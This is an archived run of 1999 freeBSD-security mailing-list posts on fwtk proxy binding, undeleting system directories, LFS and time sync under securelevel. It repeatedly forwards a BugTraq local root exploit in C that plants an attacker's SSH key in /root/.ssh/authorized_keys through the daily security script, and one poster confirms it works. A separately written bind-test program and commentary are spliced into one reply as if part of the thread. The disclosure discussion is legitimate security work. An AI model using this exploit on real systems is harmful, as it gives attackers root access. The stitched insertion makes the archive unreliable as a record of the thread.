> than 1.2, get the newest one - that will probably be your problem. There
> are known issues with earlier versions attempting to bind specific IP
> addresses on some systems.
>

Oops, silly of me to include the version of everything but the IPBind code. Version 1.2 already (:

>
> My next suggestion would be to verify that the IP address you are
> specifying (172.16.30.4) is indeed the one that you want to use and that
> it is correctly configured on the local machine. I know this sounds
> basic, but most of the problem e-mails I get regarding the patch end up
> being this very problem. A good sign of a computer nut is that his eyes
> are almost completely blurry from working all night...
>

Good suggestion just the same, I can bind the plug-gw by port only and connect via the IP address in question. First I started with an alias IP & then moved on to using the base adapter IP which I know works.

An interesting direct reply I had suggested that FreeBSD requires the entire sockaddr_in structure to be bzero'ed before assigning the address.

In the mean time I have found the Socket-address template structure and a sample diagram for the Internet-domain socket name (Design & Implementation 4.4 BSD) showing the layout as follows:

    sa_len, sa_family, sa_data
    1-byte, 1-byte, variable-length

Which in this case should be:

    sin_len, AF_INET, sin_port, sin_addr, sin_zero

My 'c' code is very rusty but I will follow this up.

I use freeBSD on a number of production servers in various secure roles and find it to be the most interesting, fun and stable OS of any I have ever used :)

Mike.
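The bzero-then-bind point above, as an added C example that is not part of Mike's message, of fwtk or of the IPBind patch: it fills a sockaddr_in in the 4.4BSD layout he quotes (zeroed first, sin_len set on the BSDs, family/port/address in network order), binds a TCP socket to one local address, and reports the errno so that EADDRNOTAVAIL ("Can't assign requested address", the error in his FreeBSD log, meaning the address is not configured on any local interface) can be told apart from EACCES (a privileged port without rights). The function names and the sample addresses are mine; the OS-macro test for sin_len is an assumption, since there is no standard feature macro for that field.

```c
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/*
 * Fill *sin for ip:port following the layout sin_len, sin_family,
 * sin_port, sin_addr, sin_zero. The struct is zeroed first so sin_zero and
 * any padding are clean; sin_len is set only where the field exists
 * (assumption: the listed OS macros are the systems that have it).
 * Returns 0, or -1 if ip is not a dotted quad.
 */
int fill_sockaddr_in(struct sockaddr_in *sin, const char *ip, unsigned short port)
{
    memset(sin, 0, sizeof *sin);
#if defined(__FreeBSD__) || defined(__NetBSD__) || defined(__OpenBSD__) || defined(__APPLE__)
    sin->sin_len = sizeof *sin;
#endif
    sin->sin_family = AF_INET;
    sin->sin_port = htons(port);        /* network byte order */
    if (inet_pton(AF_INET, ip, &sin->sin_addr) != 1)
        return -1;
    return 0;
}

/*
 * Create a TCP socket bound to ip:port (port 0 = any free port).
 * Returns the descriptor, or -1 with errno left as the failing call set it:
 *   EADDRNOTAVAIL  "Can't assign requested address": ip is not configured
 *                  on any local interface
 *   EACCES         privileged port without the rights to bind it
 *   EADDRINUSE     something already listens there
 */
int bind_to(const char *ip, unsigned short port)
{
    struct sockaddr_in sin;
    int fd, on = 1, saved;

    if (fill_sockaddr_in(&sin, ip, port) < 0) {
        errno = EINVAL;
        return -1;
    }
    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof on) < 0 ||
        bind(fd, (const struct sockaddr *)&sin, sizeof sin) < 0) {
        saved = errno;          /* close() must not clobber the real reason */
        close(fd);
        errno = saved;
        return -1;
    }
    return fd;
}

int main(int argc, char **argv)
{
    /* Defaults are constructed sample values, not addresses from the thread. */
    const char *ip = argc > 1 ? argv[1] : "127.0.0.1";
    unsigned short port = argc > 2 ? (unsigned short)atoi(argv[2]) : 0;
    int fd = bind_to(ip, port);

    if (fd < 0) {
        printf("bind %s:%u failed: %s%s\n", ip, (unsigned)port, strerror(errno),
               errno == EADDRNOTAVAIL ? " (not a local address)" : "");
        return 1;
    }
    printf("bound %s:%u on fd %d\n", ip, (unsigned)port, fd);
    close(fd);
    return 0;
}
```

Run it as `./bindtest 172.16.30.4 81` on the gateway: if the message is EADDRNOTAVAIL the address is simply not on any interface of that host (check with ifconfig), if it is EACCES the process lacks the rights for a port below 1024, and if it succeeds the problem lies in how the proxy builds its own sockaddr_in rather than in the kernel.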
Michael Williams
Software Dynamics
mailto:sdynamic@xtra.co.nz
http://www.voyager.co.nz/~michaelw
cell ph: 025 995 914
ph: +64 9 2744876

>>
>> Has anyone used the really cool fwtk IPBind patch for daemon mode plug-gw
>> proxies with success on any of the freeBSD OS versions?
>>
>> I have found it to work exactly as expected under RedHat Linux 6.0 as per
>> the syslog entries at the end of this mail.
>>
>> The documentation clearly states,
>> This patch has been tested and verified on the following systems:
>>
>> Solaris 2.5.1 (sparc)
>> Solaris 2.5 (x86)
>>
>> So I am not expecting too much as it does work on my test RedHat server just
>> not on the freeBSD 3.2 server which happens to be the gateway I want to use
>> this on (:
>>
>> However looking through the source code I can see that under freeBSD it
>> makes it through the create socket call, then the setsockopt call OK but
>> fails on the Bind seeming to not like the address.
>> I am not sure how to figure out if the problem is an access rights issue or
>> perhaps an address:port format issue.
>>
>> A point worth noting is that when configured to bind the port only, then
>> the bind is fine and in fact the proxy works as expected and when run in
>> daemon mode sets up a listener on *.port for all interfaces.
>>
>> I do have an IPFW rulebase loaded on the freeBSD server which does not seem
>> to interfere as the plug-gw behaves fine as bind to port only.
>>
>> Looking through my 4.4BSD books I can see that the bind call is quite happy
>> to bind the address of 0/ and decide on the fly the correct interface and
>> this made me wonder if it wanted to bind to an interface address rather than
>> an IP address?
>>
>> I am starting the proxy with the following,
>> /usr/local/etc/plug-gw -daemon 192.168.30.3:80 -name plug-http
>>
>> Here are the syslog entries from both servers.
>> Hope they come through legible.
>>
>> redhat 6 linux 2.2.15-22 kernel.
>> Aug 23 18:26:17 xmailgate plug-gw[615]: Starting daemon mode on ip
>> 192.168.30.3(192.168.30.3), port 80
>> .
>> .
>> Aug 25 05:10:54 xmailgate plug-gw[1139]: HERE!!! av[0] = 80
>> Aug 25 05:10:54 xmailgate last message repeated 3 times
>> Aug 25 05:10:54 xmailgate plug-gw[1139]: YO!!! localip = 192.168.30.3
>> Aug 25 05:10:54 xmailgate plug-gw[1139]: connect
>> host=sdakx0.xx.xx/192.168.30.10 destination=10.0.30.4/8080
>>
>>
>> freebsd 3.2 kernel
>> Aug 24 06:13:19 sd172-lx52 plug-gw[1810]: Starting daemon mode on ip
>> 172.16.30.4
>> (172.16.30.4), port 81
>> Aug 24 06:13:19 sd172-lx52 plug-gw[1810]: Failed to bind port 81, Can't
>> assign requested address
>>
>> Any helpful comment would be appreciated.
>> Thanks,
>> Mike.
>>
>> Michael Williams
>> Software Dynamics
>> mailto:sdynamic@xtra.co.nz
>> http://www.voyager.co.nz/~michaelw
>> cell ph: 025 995 914
>> ph: +64 9 2744876
>>
>

From owner-freebsd-security Wed Aug 25 15: 0:31 1999
Delivered-To: freebsd-security@freebsd.org
Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 9B24114F66 for ; Wed, 25 Aug 1999 15:00:24 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id OAA17000; Wed, 25 Aug 1999 14:57:29 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
To: Uldis Kuplis
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: undelete
In-reply-to: Your message of "Wed, 25 Aug 1999 10:54:34 +0300." <37C3A13A.2A94EDFB@kb.lkb.bkc.lv>
Date: Wed, 25 Aug 1999 14:57:28 -0700
Message-ID: <16996.935618248@localhost>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> User, who was admin, and had wheel group,
> deleted /bin; /etc; /var directories from my FreeBSD 3.1.
Don't let users, especially users like this, do that. That's the first lesson to be learned here. :)

> Can I undelete these directories?
> If it possible, then how to do it?

No, you should simply reinstall them from a FreeBSD bin distribution (it's just a split, gzip'd tar file and you should be able to figure out how to extract parts of it by reading the tar man page). Directories and files which have been deleted in FreeBSD don't go to a trashcan, they go to the great bit-haven in the sky immediately and there's really no way to bring them back unless you're a Unix filesystem internals whiz and can use fsdb blindfolded. That's definitely not a practical solution in this case and so you'll have to simply restore them.

- Jordan

From owner-freebsd-security Wed Aug 25 18:40:11 1999
Delivered-To: freebsd-security@freebsd.org
Received: from maxim.gba.oz.au (gba.tmx.com.au [203.9.155.249]) by hub.freebsd.org (Postfix) with SMTP id 5AD6B152A9 for ; Wed, 25 Aug 1999 18:39:47 -0700 (PDT) (envelope-from gjb-freebsd@gba.oz.au)
Received: (qmail 4234 invoked from network); 26 Aug 1999 06:39:57 +1000
Received: from alice.gba.oz.au (192.168.1.11) by maxim.gba.oz.au with SMTP; 26 Aug 1999 06:39:57 +1000
Received: (qmail 646 invoked by uid 1001); 26 Aug 1999 06:39:56 +1000
Message-ID: <19990825203955.645.qmail@alice.gba.oz.au>
X-Posted-By: GBA-Post 1.03 20-Sep-1998
X-PGP-Fingerprint: 5A91 6942 8CEA 9DAB B95B C249 1CE1 493B 2B5A CE30
Date: Thu, 26 Aug 1999 06:39:55 +1000
From: Greg Black
To: "H. Eckert"
Cc: freebsd-security@FREEBSD.ORG
Subject: Re: Securelevel 3 and setting time
References: <19990822112923.6666.qmail@alice.gba.oz.au> <19990822194140.623D211@woodstock.monkey.net> <19990824235908.B70739@server.nostromo.in-berlin.de>
In-reply-to: <19990824235908.B70739@server.nostromo.in-berlin.de> of Tue, 24 Aug 1999 23:59:08 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> The main question we haven't come to a conclusion so far is
> what action should(n't) be taken as a possible solution for the
> "rarely synched clock in an elevated secure level" scenario.
>
> - Loosen security and allow for bigger time jumps ?
> - Forcing the admin to sync the clock more often ?
> - Enabling ntpdate to distribute the time adjustments into
>   several smaller jumps instead of a big leap ?

Surely the simple solution here is to build ntpdate so that it always uses adjtime(2).

--
Greg Black
--

From owner-freebsd-security Wed Aug 25 18:40:35 1999
Delivered-To: freebsd-security@freebsd.org
Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with ESMTP id CC0F015C1F for ; Wed, 25 Aug 1999 18:40:24 -0700 (PDT) (envelope-from jeremyp@gsmx07.alcatel.com.au)
Received: by border.alcanet.com.au id <40335>; Thu, 26 Aug 1999 11:38:51 +1000
Date: Thu, 26 Aug 1999 11:39:57 +1000
From: Peter Jeremy
Subject: Re: undelete
In-reply-to: <16996.935618248@localhost>
To: uldisk@kb.lkb.bkc.lv
Cc: freebsd-security@FreeBSD.ORG
Message-Id: <99Aug26.113851est.40335@border.alcanet.com.au>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

"Jordan K. Hubbard" wrote:
>> User, who was admin, and had wheel group,
>> deleted /bin; /etc; /var directories from my FreeBSD 3.1.
...
> No, you should simply reinstall them from a FreeBSD bin distribution

It's worth pointing out that it isn't quite this simple.

For /bin it'll work. In /etc, you'll need to go through and reconfigure most of the files (though for a simple setup, this should be limited to rc.conf, fstab, hosts, group, resolv.conf, exports and aliases). When you're rebuilding /etc/group, remember to leave that user out of wheel :-).

/var is the most serious. Basically all you'll get out of the distribution is a set of empty directories. The contents are virtually all system dependent. In particular, you'll have lost records of what packages (if any) you've installed, users' mail (including any queued mail), games scores, cron jobs, at jobs, accounting information, backups of most of the critical files from /etc, etc.

If someone would like to fix LFS so it works, creating an `undelete' command becomes much simpler...

Peter

From owner-freebsd-security Wed Aug 25 19:51:25 1999
Delivered-To: freebsd-security@freebsd.org
Received: from cx33363-a.dt1.sdca.home.com (cx33363-a.dt1.sdca.home.com [24.0.129.48]) by hub.freebsd.org (Postfix) with ESMTP id 20F2214E94 for ; Wed, 25 Aug 1999 19:51:23 -0700 (PDT) (envelope-from obecian@cx33363-a.dt1.sdca.home.com)
Received: (from obecian@localhost) by cx33363-a.dt1.sdca.home.com (8.9.3/8.9.3) id TAA05191 for freebsd-security@freebsd.org; Wed, 25 Aug 1999 19:50:48 -0700 (PDT) (envelope-from obecian)
Date: Wed, 25 Aug 1999 19:50:48 -0700 (PDT)
From: obecian
Message-Id: <199908260250.TAA05191@cx33363-a.dt1.sdca.home.com>
To: freebsd-security@freebsd.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

unsubscribe

From owner-freebsd-security Wed Aug 25 19:53:45 1999
Delivered-To: freebsd-security@freebsd.org
Received: from cx33363-a.dt1.sdca.home.com (cx33363-a.dt1.sdca.home.com [24.0.129.48]) by hub.freebsd.org (Postfix) with ESMTP id A41CD15411 for ; Wed, 25 Aug 1999 19:53:43 -0700 (PDT) (envelope-from obecian@cx33363-a.dt1.sdca.home.com)
Received: (from obecian@localhost) by cx33363-a.dt1.sdca.home.com (8.9.3/8.9.3) id TAA05240 for freebsd-security@freebsd.org; Wed, 25 Aug 1999 19:53:44 -0700 (PDT) (envelope-from obecian)
Date: Wed, 25 Aug 1999 19:53:44 -0700 (PDT)
From: obecian
Message-Id: <199908260253.TAA05240@cx33363-a.dt1.sdca.home.com>
To: freebsd-security@freebsd.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

unsubscribe freebsd-security

From owner-freebsd-security Wed Aug 25 20: 8:42 1999
Delivered-To: freebsd-security@freebsd.org
Received: from pop3-3.enteract.com (pop3-3.enteract.com [207.229.143.32]) by hub.freebsd.org (Postfix) with SMTP id D91A514E94 for ; Wed, 25 Aug 1999 20:08:40 -0700 (PDT) (envelope-from dscheidt@enteract.com)
Received: (qmail 95142 invoked from network); 26 Aug 1999 03:06:15 -0000
Received: from shell-2.enteract.com (dscheidt@207.229.143.41) by pop3-3.enteract.com with SMTP; 26 Aug 1999 03:06:15 -0000
Date: Wed, 25 Aug 1999 22:06:15 -0500 (CDT)
From: David Scheidt
To: Peter Jeremy
Cc: uldisk@kb.lkb.bkc.lv, freebsd-security@FreeBSD.ORG
Subject: Re: undelete
In-Reply-To: <99Aug26.113851est.40335@border.alcanet.com.au>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 26 Aug 1999, Peter Jeremy wrote:

> If someone would like to fix LFS so it works, creating an `undelete'
> command becomes much simpler...
>

What, exactly, is broken with LFS? Or, at least, when did it get broken?
David

From owner-freebsd-security Wed Aug 25 20:37:11 1999
Delivered-To: freebsd-security@freebsd.org
Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 6342D14CF0 for ; Wed, 25 Aug 1999 20:37:10 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id UAA01204; Wed, 25 Aug 1999 20:36:47 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
To: David Scheidt
Cc: Peter Jeremy , uldisk@kb.lkb.bkc.lv, freebsd-security@FreeBSD.ORG
Subject: Re: undelete
In-reply-to: Your message of "Wed, 25 Aug 1999 22:06:15 CDT."
Date: Wed, 25 Aug 1999 20:36:47 -0700
Message-ID: <1201.935638607@localhost>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

It never actually worked is the actual case.

> On Thu, 26 Aug 1999, Peter Jeremy wrote:
>
> > If someone would like to fix LFS so it works, creating an `undelete'
> > command becomes much simpler...
> >
> What, exactly, is broken with LFS? Or, at least, when did it get broken?
>
> David
>

From owner-freebsd-security Wed Aug 25 21: 2:55 1999
Delivered-To: freebsd-security@freebsd.org
Received: from pop3-3.enteract.com (pop3-3.enteract.com [207.229.143.32]) by hub.freebsd.org (Postfix) with SMTP id DCB5C15AA1 for ; Wed, 25 Aug 1999 21:02:41 -0700 (PDT) (envelope-from dscheidt@enteract.com)
Received: (qmail 22629 invoked from network); 26 Aug 1999 04:01:59 -0000
Received: from shell-2.enteract.com (dscheidt@207.229.143.41) by pop3-3.enteract.com with SMTP; 26 Aug 1999 04:01:59 -0000
Date: Wed, 25 Aug 1999 23:01:59 -0500 (CDT)
From: David Scheidt
To: "Jordan K. Hubbard"
Cc: Peter Jeremy , freebsd-security@FreeBSD.ORG
Subject: Re: undelete
In-Reply-To: <1201.935638607@localhost>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 25 Aug 1999, Jordan K. Hubbard wrote:

> It never actually worked is the actual case.

That is what I expected. It works in NetBSD, doesn't it?
David Scheidt

From owner-freebsd-security Wed Aug 25 21:14:58 1999
Delivered-To: freebsd-security@freebsd.org
Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with ESMTP id B3399153CC for ; Wed, 25 Aug 1999 21:14:49 -0700 (PDT) (envelope-from jeremyp@gsmx07.alcatel.com.au)
Received: by border.alcanet.com.au id <40346>; Thu, 26 Aug 1999 14:11:43 +1000
Date: Thu, 26 Aug 1999 14:12:46 +1000
From: Peter Jeremy
Subject: Re: undelete
In-reply-to:
To: dscheidt@enteract.com
Cc: freebsd-security@FreeBSD.ORG
Message-Id: <99Aug26.141143est.40346@border.alcanet.com.au>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

David Scheidt wrote:
> What, exactly, is broken with LFS? Or, at least, when did it get broken?

To expand on Jordan's response: It was removed at the end of January 1998 with the following commit message:

}Retire LFS.
}
}If you want to play with it, you can find the final version of the
}code in the repository the tag LFS_RETIREMENT.
}
}If somebody makes LFS work again, adding it back is certainly
}desirable, but as it is now nobody seems to care much about it,
}and it has suffered considerable bitrot since its somewhat haphazard
}integration.
}
}R.I.P

Further discussion on this topic probably belongs in freebsd-fs, rather than here.
Peter

From owner-freebsd-security Thu Aug 26 4: 6:11 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mirage.nlink.com.br (mirage.nlink.com.br [200.249.195.3]) by hub.freebsd.org (Postfix) with ESMTP id E53DD153F3 for ; Thu, 26 Aug 1999 04:05:49 -0700 (PDT) (envelope-from Mlobo.Sup.EAR@ear.com.br)
Received: from ear.com.br (ppp-ear.nlink.com.br [200.249.198.33]) by mirage.nlink.com.br (8.9.3/8.9.1) with ESMTP id IAA29699 for ; Thu, 26 Aug 1999 08:04:18 -0300 (EST)
Message-Id: <199908261104.IAA29699@mirage.nlink.com.br>
Received: from EARMDPA01/SpoolDir by ear.com.br (Mercury 1.45); 26 Aug 99 08:05:55 GMT-3
Received: from SpoolDir by EARMDPA01 (Mercury 1.45); 26 Aug 99 08:03:58 GMT-3
From: "Mario de Oliveira Lobo Neto"
Organization: American School of Recife - Brazil
To: freebsd-security@FreeBSD.ORG
Date: Thu, 26 Aug 1999 08:03:45 -0300
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: VPN ???
X-mailer: Pegasus Mail for Win32 (v3.11)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello;

I would like to know if anybody on this list could help me to set up the following arrangement:

    REMOTE WorkStation (Novell Client / win 98 - IPX)
          |
          |
          |  <- Internet (Windows VPN ??)
          |
    FREEBSD 2.2.8 (ipfw running)
          |
          |  <- Currently, only TCP/IP here.
          |     (Thinking about a second net board
          |      just for an IPX link here)
          |
    NOVELL 4.11 ----------------------- Local LAN (IPX only)
    (IP/IPX gateway running)

Yes, the attempt is to login to novell using the internet as a tunnel for IPX packets.

Anyone knows if this is possible ?
Thanks in advance,

Mario Lobo
-
*** Mario Lobo - mlobo@ear.com.br ***
American School of Recife

From owner-freebsd-security Thu Aug 26 9:47:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from forrie.net (forrie.net [216.67.12.69]) by hub.freebsd.org (Postfix) with ESMTP id 5289C15ED5 for ; Thu, 26 Aug 1999 09:47:12 -0700 (PDT) (envelope-from forrie@forrie.com)
Received: from boomer (boomer.navinet.net [216.67.12.90]) by forrie.net (8.9.3/8.9.3) with ESMTP id MAA08535 for ; Thu, 26 Aug 1999 12:47:03 -0400 (EDT)
Message-Id: <4.2.0.58.19990826124527.00aa85b0@216.67.12.69>
X-Sender: forrie@216.67.12.69
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58
Date: Thu, 26 Aug 1999 12:45:37 -0400
To: freebsd-security@freebsd.org
From: Forrest Aldrich
Subject: Fwd: FreeBSD (and other BSDs?) local root explot
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>Approved-By: aleph1@SECURITYFOCUS.COM
>Delivered-To: bugtraq@securityfocus.com
>X-Mailer: XFMail 1.3 [p0] on Linux
>X-SMS: +48601383657@text.plusgsm.pl
>X-PGP: PGP key on WWW or finger
>X-Operating-System: FreeBSD 3.2-STABLE (i386)
>Date: Tue, 24 Aug 1999 23:47:05 +0200
>Reply-To: Przemyslaw Frasunek
>Sender: Bugtraq List
>From: Przemyslaw Frasunek
>Organization: Lubelska Grupa Uzytkownikow BSD
>Subject: FreeBSD (and other BSDs?) local root explot
>X-To: bugtraq@securityfocus.com
>To: BUGTRAQ@SECURITYFOCUS.COM
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>/*
>
> (c) 1999 babcia padlina ltd.
>
> bug in fts_print function allows to overwrite any file in system, when
> running /etc/security script (executed from 'daily' scripts).
>
> affected systems:
> - freebsd (all versions)
> - probably openbsd/netbsd
>
> fix:
> - limit root's coredump size
> - patch libc
>
>*/
>
>#include
>#include
>#include
>#include
>#include
>
>#define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
>#define FILE "/root/.ssh/authorized_keys"
>#define CORE "find.core"
>#define DEPTH 300
>#define BUFSIZE 250
>
>int makedir(dir, linkfrom, linkto)
>char *dir, *linkfrom, *linkto;
>{
>
>    if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
>        return -1;
>
>    if (chdir(dir))
>        return -1;
>
>    if (symlink(linkfrom, linkto) < 0)
>        return -1;
>
>    return 0;
>}
>
>
>int main(argc, argv)
>int argc;
>char **argv;
>{
>    int i = 0;
>    char pid[10], buf[BUFSIZE];
>
>    sprintf(pid, "%d", getpid());
>
>    if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
>    {
>        perror("mkdir()");
>        return -1;
>    }
>
>    if (chdir(pid))
>    {
>        perror("chdir()");
>        return -1;
>    }
>
>    bzero(buf, BUFSIZE);
>    memset(buf, 0x41, BUFSIZE-1);
>
>    for(i=0;i
>    {
>        if (makedir(STRING, FILE, CORE) < 0)
>        {
>            perror("makedir()");
>            return -1;
>        }
>
>        if(makedir(buf, FILE, CORE) < 0)
>        {
>            perror("makedir()");
>            return -1;
>        }
>    }
>
>    return 0;
>}
>
>- ---
>* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 *
>* Inet: venglin@FreeBSD.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
>
>-----BEGIN PGP SIGNATURE-----
>Version: PGPfreeware 5.0i for non-commercial use
>Charset: noconv
>
>iQA/AwUBN8MS2P6SPyHAYTvjEQLK5ACfZ1cVpjGzqIF3bTsIX/wrahJOqy4AoOEx
>JkgnTo+Dk3QUFGT2bZdmxx9S
>=Tyvh
>-----END PGP SIGNATURE-----

From owner-freebsd-security Thu Aug 26 9:51:21 1999
Delivered-To: freebsd-security@freebsd.org
Received: from forty-two.egroups.net (adsl-63-193-211-127.dsl.snfc21.pacbell.net [63.193.211.127]) by hub.freebsd.org (Postfix) with ESMTP id 8FD3815C6F; Thu, 26 Aug 1999 09:51:17 -0700 (PDT) (envelope-from gsutter@forty-two.egroups.net)
Received: (from gsutter@localhost) by forty-two.egroups.net (8.9.3/8.9.2) id JAA38551; Thu, 26 Aug 1999 09:49:10 -0700 (PDT) (envelope-from gsutter)
Date: Thu, 26 Aug 1999 09:49:10 -0700
From: Gregory Sutter
To: security-officer@freebsd.org
Cc: freebsd-security@freebsd.org
Subject: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot]
Message-ID: <19990826094910.F20512@forty-two.egroups.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.4i
Organization: Zer0
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

This claims to describe a FreeBSD root exploit, and was just posted to BugTraq.

----- Forwarded message from Przemyslaw Frasunek -----

Message-ID:
Date: Tue, 24 Aug 1999 23:47:05 +0200
Sender: Bugtraq List
From: Przemyslaw Frasunek
Subject: FreeBSD (and other BSDs?) local root explot
Content-Type: application/pgp; format=text; x-action=sign

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

/*

 (c) 1999 babcia padlina ltd.

 bug in fts_print function allows to overwrite any file in system, when
 running /etc/security script (executed from 'daily' scripts).
 affected systems:
 - freebsd (all versions)
 - probably openbsd/netbsd

 fix:
 - limit root's coredump size
 - patch libc

*/

#include
#include
#include
#include
#include

#define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
#define FILE "/root/.ssh/authorized_keys"
#define CORE "find.core"
#define DEPTH 300
#define BUFSIZE 250

int makedir(dir, linkfrom, linkto)
char *dir, *linkfrom, *linkto;
{

    if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
        return -1;

    if (chdir(dir))
        return -1;

    if (symlink(linkfrom, linkto) < 0)
        return -1;

    return 0;
}

int main(argc, argv)
int argc;
char **argv;
{
    int i = 0;
    char pid[10], buf[BUFSIZE];

    sprintf(pid, "%d", getpid());

    if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
    {
        perror("mkdir()");
        return -1;
    }

    if (chdir(pid))
    {
        perror("chdir()");
        return -1;
    }

    bzero(buf, BUFSIZE);
    memset(buf, 0x41, BUFSIZE-1);

    for(i=0;i

X-Sender: hart@anchovy.orem.iserver.com
To: Gregory Sutter
Cc: security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD (and other BSDs?) local root explot]
In-Reply-To: <19990826094910.F20512@forty-two.egroups.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 26 Aug 1999, Gregory Sutter wrote:

> This claims to describe a FreeBSD root exploit, and was just posted
> to BugTraq.

... and was posted to freebsd-security yesterday. ;-)

> bug in fts_print function allows to overwrite any file in system, when
> running /etc/security script (executed from 'daily' scripts).
>
> affected systems:
> - freebsd (all versions)
> - probably openbsd/netbsd
>
> fix:
> - limit root's coredump size
> - patch libc

Tested and works on 3.2-STABLE of last week.

Paul Hart

--
Paul Robert Hart        ><8> ><8> ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

From owner-freebsd-security Thu Aug 26 9:57:43 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 4E75D14E96; Thu, 26 Aug 1999 09:57:32 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id MAA06123; Thu, 26 Aug 1999 12:56:29 -0400 (EDT)
Message-Id: <3.0.5.32.19990826125500.01d258a0@staff.sentex.ca>
X-Sender: mdtpop@staff.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32)
Date: Thu, 26 Aug 1999 12:55:00 -0400
To: freebsd-security@freebsd.org
From: Mike Tancsa
Subject: New exploit ? Patch ? (from BUGTRAQ Aug26 1999)
Cc: security-officer@freebsd.org
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

From BUGTRAQ today...

---Mike

Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@securityfocus.com
X-Mailer: XFMail 1.3 [p0] on Linux
X-SMS: +48601383657@text.plusgsm.pl
X-PGP: PGP key on WWW or finger
X-Operating-System: FreeBSD 3.2-STABLE (i386)
Date: Tue, 24 Aug 1999 23:47:05 +0200
Reply-To: Przemyslaw Frasunek
Sender: Bugtraq List
From: Przemyslaw Frasunek
Organization: Lubelska Grupa Uzytkownikow BSD
Subject: FreeBSD (and other BSDs?) local root explot
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

/*

 (c) 1999 babcia padlina ltd.

 bug in fts_print function allows to overwrite any file in system, when
 running /etc/security script (executed from 'daily' scripts).
 affected systems:
 - freebsd (all versions)
 - probably openbsd/netbsd

 fix:
 - limit root's coredump size
 - patch libc

*/

#include
#include
#include
#include
#include

#define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
#define FILE "/root/.ssh/authorized_keys"
#define CORE "find.core"
#define DEPTH 300
#define BUFSIZE 250

